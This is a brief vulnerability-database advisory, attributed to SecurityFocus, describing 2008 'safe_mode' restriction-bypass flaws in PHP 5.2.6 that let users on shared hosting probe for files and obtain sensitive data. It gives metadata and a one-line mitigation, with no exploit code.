Vendor: PHP
By: SecurityFocus
CVSS: 7.5 (HIGH)
Restriction Bypass
CWE: 264
Product Name: PHP
Affected Version From: PHP 5.2.6
Affected Version To: Other versions may also be affected.
Patch Exists: YES
Related CWE: N/A
CPE: a:php:php
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
PHP ‘safe_mode’ Restriction Bypass Vulnerabilities
PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible. Exploiting these issues allows attackers to obtain sensitive data that could be used in other attacks. These vulnerabilities would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' restriction is expected to isolate users from each other.
Mitigation:
Ensure that the 'safe_mode' restriction is properly configured and enforced.